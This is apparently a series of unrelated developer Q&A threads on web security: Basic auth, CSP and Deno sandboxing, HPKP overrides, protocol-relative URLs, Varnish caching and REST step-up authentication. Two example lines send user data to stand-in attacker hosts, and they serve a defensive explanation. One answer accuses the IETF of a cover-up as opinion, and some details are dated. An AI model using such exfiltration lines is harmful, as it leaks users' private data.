My site uses HTTP authentication and I've learned it isn't very secure. It also causes a lot of problems for many browsers, and not all browsers may support it, so I want to use an alternative that is secure and more widely supported. What are some alternatives?
Is it possible to lock all directories using an HTML login page?
My site uses HTTP authentication and I've learned it isn't very secure
That's false... unless you're referring to something like basic auth over an insecure channel. In that case, anything over the insecure channel has potential issues. (Even if you did some client-side encryption hackery, you still have the problem that the remote host is not verified without the TLS or SSL layer.)
Basic auth is fine in some cases, and not for others. It depends on what you're trying to do.
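For concreteness, here is a minimal sketch of what validating Basic auth looks like server-side (a Node.js illustration with placeholder credentials, not something taken from the question); the point is that the credentials travel base64-encoded rather than encrypted, so this is only reasonable when the whole exchange sits behind TLS:

const http = require('http');

// Placeholder credentials for illustration only.
const USER = 'alice';
const PASS = 'correct horse battery staple';

http.createServer((req, res) => {
  const header = req.headers['authorization'] || '';
  const [scheme, encoded] = header.split(' ');
  // Basic auth is just base64("user:pass") - readable by anyone on the path
  // unless the connection is protected by TLS.
  const decoded = Buffer.from(encoded || '', 'base64').toString();
  if (scheme !== 'Basic' || decoded !== `${USER}:${PASS}`) {
    res.writeHead(401, { 'WWW-Authenticate': 'Basic realm="example"' });
    return res.end('Authentication required');
  }
  res.end('Hello, authenticated user');
}).listen(8080);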
it causes a lot of problems for many browsers, and not all browsers may support it
Completely false. I've never seen a browser that didn't support basic auth and digest auth.
what are some alternatives?
This isn't possible to answer without a better understanding of your requirements. Two-factor auth with a DNA sample and a brainwave scan might be more secure but chances are that's not what you're looking for. Besides, you can't forget about the rest of your system and you've told us nothing about that.
Is it possible to lock all directories using an HTML login page?
Yes. How you do this depends on what you're running server-side, but yes it's completely possible and often done.
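As one hedged sketch of the common pattern (assuming a Node.js/Express stack with express-session; the paths, session secret, and credential check are all placeholders): an HTML login form posts to the server, which sets a session cookie, and a small middleware gate then protects everything under the private directory.

const express = require('express');
const session = require('express-session');

const app = express();
app.use(express.urlencoded({ extended: false }));
app.use(session({ secret: 'change-me', resave: false, saveUninitialized: false }));
app.use(express.static('public')); // serves login.html and other public assets

// Placeholder: verify against your real user store (database, LDAP, ...).
function checkCredentials(user, pass) {
  return user === 'admin' && pass === 'secret';
}

// The HTML login form (login.html) posts its fields here.
app.post('/login', (req, res) => {
  if (checkCredentials(req.body.user, req.body.pass)) {
    req.session.user = req.body.user;
    return res.redirect('/private/');
  }
  res.status(401).send('Invalid login');
});

// Gate: anything under /private requires a valid session.
app.use('/private', (req, res, next) => {
  if (!req.session.user) return res.redirect('/login.html');
  next();
});
app.use('/private', express.static('private'));

app.listen(3000);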
The background scenario is that I want to give my users a JavaScript tool which they can use to analyze their sensitive private data, and I want them to feel safe that this data will not be sent to the internet.
Initially, I thought I'd just distribute it as an .html file with an embedded <script>, and that they'd simply open this .html file in a browser over the file:/// protocol, which gives some nice same-origin policy defaults.
But this won't really offer much security to my users: the script could easily create an <img src="https://evil.com?sensitive-data=${XYZ}"> tag which would send a GET request to evil.com, despite evil.com being a different origin, because embedding images from different origins is allowed by design.
Is there some practical way in which I could distribute my JavaScript, and/or for the end user to run such a script, so they could be reasonably sure it can't send the data over the internet?
(Unplugging the machine from the internet, installing a VM, or manipulating firewall settings are not practical.)
(Reasonably sure = assuming that the software they use, such as the browser, follows the spec and wasn't hacked.)
Please take a look at the Content-Security-Policy topic.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/img-src
Supplementing your HTML with <meta http-equiv="Content-Security-Policy" content="img-src 'self';"> should stop the browser from loading images from foreign origins; broadening the policy (for example with default-src) covers the other request types as well.
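As a sketch of what a locked-down distributable .html file might look like (the exact policy here is my assumption about what "no foreign resources" should mean for this use case, so it goes beyond img-src): default-src 'none' denies everything that isn't explicitly allowed, and connect-src 'none' also covers fetch/XHR/WebSocket exfiltration.

<!DOCTYPE html>
<html>
<head>
  <!-- Deny all foreign resources; only inline script/style and same-origin images are allowed. -->
  <meta http-equiv="Content-Security-Policy"
        content="default-src 'none'; img-src 'self'; script-src 'unsafe-inline'; style-src 'unsafe-inline'; connect-src 'none'; form-action 'none'">
</head>
<body>
  <script>
    // The analysis code runs here. With the policy above, the browser should
    // refuse to load <img>, <script>, fetch()/XHR, etc. from other origins.
  </script>
</body>
</html>

Note that CSP delivered via a meta tag is enforced even for pages opened over file://, though a script can still navigate the page away (e.g. via window.location), which CSP alone does not fully prevent.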
An alternative approach could be to develop your project as a browser extension, where you can set up the content security policy quite precisely, including rules for inline scripting, string-to-JS evaluation (eval), frame and font origins, and so on ( https://developer.chrome.com/docs/apps/contentSecurityPolicy/ ).
As a bonus, you (and your users) get a free-of-charge code review from the security teams of the browser vendors.
Setting the browser's proxy (in its settings) to localhost:DUMMY_PORT looks like a safe solution for this case, since every outgoing request then fails against a port nothing is listening on.
Deno is, to cite its website:
Deno is a simple, modern and secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust.
Secure by default. No file, network, or environment access, unless explicitly enabled.
So this reduces what the user has to trust to Deno itself (and to Chocolatey, if they want to use choco install deno to install it).
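A brief sketch of how that looks in practice (the file name and data are illustrative): the analysis script is ordinary JavaScript/TypeScript, and as long as the user runs it without --allow-net, the runtime refuses any attempt to reach the network.

// analyze.ts - run with:  deno run analyze.ts   (note: no --allow-net granted)
const data = "sensitive private data";

// Local computation works as usual.
console.log(`input length: ${data.length}`);

// Any network access is rejected (or requires an explicit interactive grant):
try {
  await fetch(`https://evil.example/?x=${encodeURIComponent(data)}`);
} catch (err) {
  console.log("network request refused by the runtime:", String(err));
}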
I added an HPKP header to my site, but it is not honored by Chrome or Safari. I tested it manually by setting a proxy and by going to chrome://net-internals/#hsts and looking for my domain, which was not found. The HPKP header seems correct, and I also tested it with an HPKP toolset, so I know it is valid.
I am thinking I might be doing something weird with my flow. I have a web app, which is served over myapp.example.com. On login, the app redirects the user to authserver.example.com/begin to initiate the OpenID Connect Authorization Code flow. The HPKP header is returned only from authserver.example.com/begin, and I think this might be the issue. I have includeSubDomains in the HPKP header, so I think this is not the issue.
This is the HPKP header (line breaks added for readability):
public-key-pins:max-age=864000;includeSubDomains; \
pin-sha256="bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE="; \
pin-sha256="cJjqBxF88mhfexjIArmQxvZFqWQa45p40n05C6X/rNI="; \
report-uri="https://reporturl.example"
Thanks!
I added HPKP header to my site, but it is not honored by Chrome or Safari... I tested it manually by setting a proxy...
RFC 7469, Public Key Pinning Extension for HTTP, kind of sneaks that past you. The IETF published it with overrides, so an attacker can break a known good pinset. It's mentioned once in the standard by the name "override", but the details are not provided. The IETF also failed to publish a discussion of it in a security considerations section.
More to the point, the proxy you set up engaged the override. It does not matter whether it's the wrong proxy, a proxy certificate installed by a mobile device OEM, or a proxy controlled by an attacker who tricked a user into installing it. The web security model and the standard allow it. They embrace interception and consider it a valid use case.
Something else they did was make the reporting of the broken pinset a Must Not or Should Not. It means the user agent is complicit in the cover-up, too. That's not discussed in a security considerations section, either. They really don't want folks to know their supposedly secure connection is being intercepted.
Your best bet to avoid it is to move outside the web security model. Don't use browser-based apps when security is a concern. Use a hybrid app and perform the pinning yourself. Your hybrid app can host a WebView control or view but still get access to the channel to verify parameters. Also see OWASP's Certificate and Public Key Pinning.
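As a rough illustration of "perform the pinning yourself" outside the browser (a Node.js sketch, purely as an example of the technique; the host is taken from the question, the pin value is a placeholder, and it assumes a Node version whose certificate object exposes pubkey): hash the server's SubjectPublicKeyInfo during the TLS handshake and refuse the connection when it doesn't match the expected pin.

const https = require('https');
const tls = require('tls');
const crypto = require('crypto');

// Placeholder: base64 SHA-256 of the server's SubjectPublicKeyInfo (SPKI).
const EXPECTED_PIN = 'bcppaSjDk7AM8C/13vyGOR+EJHDYzv9/liatMm4fLdE=';

const req = https.request({
  host: 'authserver.example.com',
  path: '/begin',
  checkServerIdentity: (host, cert) => {
    // Keep the default hostname verification...
    const err = tls.checkServerIdentity(host, cert);
    if (err) return err;
    // ...then add the pin check on top of normal chain validation.
    const pin = crypto.createHash('sha256').update(cert.pubkey).digest('base64');
    if (pin !== EXPECTED_PIN) {
      return new Error('public key pin mismatch - possible interception');
    }
    return undefined;
  },
}, (res) => console.log('status:', res.statusCode));

req.on('error', (err) => console.error(err.message));
req.end();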
Also see Comments on draft-ietf-websec-key-pinning on the IETF mailing list. One of the suggestions in the comments was to change the title to "Public Key Pinning Extension for HTTP with Overrides" to highlight the feature. Not surprisingly, that's not something they want. They are trying to do it surreptitiously, without user knowledge.
Here's the relevant text from RFC 7469:
2.7. Interactions with Preloaded Pin Lists
UAs MAY choose to implement additional sources of pinning
information, such as through built-in lists of pinning information.
Such UAs should allow users to override such additional sources,
including disabling them from consideration.
The effective policy for a Known Pinned Host that has both built-in
Pins and Pins from previously observed PKP header response fields is
implementation-defined.
Locally installed CAs (like those used by intercepting proxies such as the one you say you are running) override any HPKP checks.
This is necessary so as not to completely break the internet, given how prevalent they are: anti-virus software and proxies used in large corporations basically MITM HTTPS traffic through a locally issued certificate, as otherwise they could not read the traffic.
Some argue that locally installing a CA requires access to your machine, and at that point it's game over anyway, but to me this still massively reduces the protection HPKP offers, and that, coupled with the high risks of using HPKP, means I am really not a fan of it.
What this means has been an oft-discussed question on Stack Overflow:
<script src="//cdn.example.com/somewhere/something.js"></script>
This gives the advantage that if you're accessing it over HTTPS, you get HTTPS automatically, instead of that scary "Insecure elements on this page" warning.
But why use protocol-relative URLs at all? Why not simply use HTTPS always in CDN URLs? After all, an HTTP page has no reason to complain if you decide to load some parts of it over HTTPS.
(This applies more specifically to CDNs; almost all CDNs have HTTPS capability, whereas your own server may not necessarily have HTTPS.)
As of December 2014, Paul Irish's blog on protocol-relative URLs says:
2014.12.17: Now that SSL is encouraged for everyone and doesn’t have performance concerns, this technique is now an anti-pattern. If the asset you need is available on SSL, then always use the https:// asset.
Unless you have specific performance concerns (such as the slow mobile network mentioned in Zakjan's answer) you should use https:// to protect your users.
Because of performance. Establishing an HTTPS connection takes much longer than HTTP; the TLS handshake adds up to 2 RTTs of extra latency. You can notice it on mobile networks. So it is better not to use HTTPS asset URLs if you don't need them.
There are a number of potential reasons, though none of them is particularly crucial:
How about the next time every business with an agenda pushes a new protocol? Are we going to have to swap out thousands of strings again then? No thanks.
HTTPS is slower than HTTP of the same version.
If any of the notes listed at caniuse.com for HTTP/2 are a problem for you.
Conceptually, if the server enforces the protocol, there is no reason to be specific about it in the first place. Agnosticism is what it is: it's covering all your bases.
One thing to note: if you are using CSP's upgrade-insecure-requests, you can safely use protocol-agnostic URLs (//example.com).
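For reference, a minimal sketch of that combination (the asset URL is illustrative): in browsers that support the directive, it upgrades insecure (http:) subresource requests to https: before fetching, so a protocol-agnostic URL ends up being fetched over HTTPS either way.

<!-- Can equivalently be sent as a response header:
     Content-Security-Policy: upgrade-insecure-requests -->
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
<script src="//cdn.example.com/somewhere/something.js"></script>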
Protocol-relative URLs sometimes break JS code that tries to detect location.protocol. They are also not understood by extremely old browsers. If you are developing web services that require maximum backward compatibility (e.g. serving crucial emergency information that must be receivable on slow connections and/or old devices), do not use protocol-relative URLs.
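A small illustration of that pitfall (the URLs are placeholders): both protocol-relative markup and JS that builds URLs from location.protocol resolve against whatever scheme the page was loaded with, which falls apart when that scheme is file:.

// On a page opened from disk, location.protocol is "file:", so both of these
// end up resolving to file://cdn.example.com/... and the request fails.
var assetUrl = location.protocol + '//cdn.example.com/app.js';

var img = document.createElement('img');
img.src = '//cdn.example.com/logo.png';
document.body.appendChild(img);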
I use Varnish to cache content in different web applications (most of them based on Django and Drupal). Those familiar with Varnish will know that it doesn't cache pages with cookies, unless you do some VCL magic, as explained in the documentation. In most cases this means that your authenticated users won't benefit from Varnish caching (please correct me if I'm wrong about this and there's a way of caching parts of a page for authenticated users with Varnish).
So, I want to write this web application using HTML5 Web Storage to allow visitors to save some data locally and I was wondering if Varnish would work with it. I understand that Web Storage doesn't use the HTTP headers as cookies do, hence Varnish caching should work.
Can anybody who has played with Varnish and HTML5 Web Storage confirm this?
(please correct me if I'm wrong about this and there's a way of caching parts of a page for authenticated users with Varnish).
You could use ESI for that, but it requires a few changes to the application to support ESI as well.
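A minimal sketch of the ESI idea (paths are placeholders, and Varnish has to be told to process ESI for the page, typically via set beresp.do_esi = true; in your VCL): the surrounding page stays cacheable, and only the user-specific fragment is fetched per request.

<!-- Cached page served to everyone -->
<div id="user-box">
  <!-- Varnish replaces this tag with the response of a separate, uncached request,
       so this fragment can vary per authenticated user. -->
  <esi:include src="/fragments/logged-in-user"/>
</div>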
So, I want to write this web application using HTML5 Web Storage to allow visitors to save some data locally and I was wondering if Varnish would work with it. I understand that Web Storage doesn't use the HTTP headers as cookies do, hence Varnish caching should work.
Since that storage is entirely client-side, it is indeed unrelated to Varnish; your server does not even know whether a client-side store is being used, since that's application logic.
It will work nicely if you use JavaScript to replace content using Web Storage.
You have to be careful, though, otherwise the user will see a "flicker" of JS replacing content.
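A small sketch of that pattern (the key and markup are placeholders): ship a generic placeholder in the cached HTML and fill in the per-user pieces from Web Storage once the DOM is ready, which is exactly where the brief flicker can come from.

// The cached page ships with a generic placeholder, e.g.
//   <span id="greeting">Hello!</span>
document.addEventListener('DOMContentLoaded', function () {
  var name = window.localStorage.getItem('displayName');
  if (name) {
    // This runs after the cached HTML has already been painted,
    // hence the possible flicker mentioned above.
    document.getElementById('greeting').textContent = 'Hello, ' + name + '!';
  }
});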
I was searching for a solution to the following problem, so far without success: I'm planning a RESTful web service where certain actions (e.g. DELETE) should require special authentication.
The idea is that users have a normal username/password login (session based or Basic Auth, doesn't really matter here) with which they can access the service. Some actions require additional authentication in the form of a PIN code or maybe even a one-time password. Including the extra piece of authentication in the login process is not possible (and would miss the point of the whole exercise).
I thought about special headers (something like X-OTP-Authentication), but that would make it impossible to access the service via a standard HTML page (there is no way to include a custom header in a link).
Another option was HTTP query parameters, but that seems to be discouraged, especially for DELETE.
Any ideas how to tackle this problem?
From REST Web Service Security with jQuery Front-End
If you haven't already, I'd recommend some reading on OAuth 1.0 and 2.0. They are both used by some of the bigger APIs, such as Facebook, Netflix, Twitter, and more. 2.0 is still in draft, but that hasn't stopped anyone from implementing and using it, as it is simpler for a client to use. It sounds like you want something more complicated and more secure, so you might want to focus on 1.0.
I always found Netflix's Authentication Overview to be a good explanation for clients.
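Coming back to the custom-header idea from the question: a plain HTML link indeed cannot carry one, but a script-driven client can. The following is only a sketch of how the extra factor might be attached regardless of whether the base scheme ends up being OAuth or a session; the header name is the question's own suggestion, and everything else is a placeholder.

var accessToken = 'PLACEHOLDER_TOKEN'; // e.g. obtained via an OAuth flow or login
var otpFromUser = '123456';            // the extra one-time PIN entered by the user

fetch('https://api.example.com/items/42', {
  method: 'DELETE',
  headers: {
    'Authorization': 'Bearer ' + accessToken,
    'X-OTP-Authentication': otpFromUser, // step-up factor only for destructive actions
  },
}).then(function (res) {
  if (res.status === 401 || res.status === 403) {
    console.log('Re-authentication or a fresh one-time password is required.');
  }
});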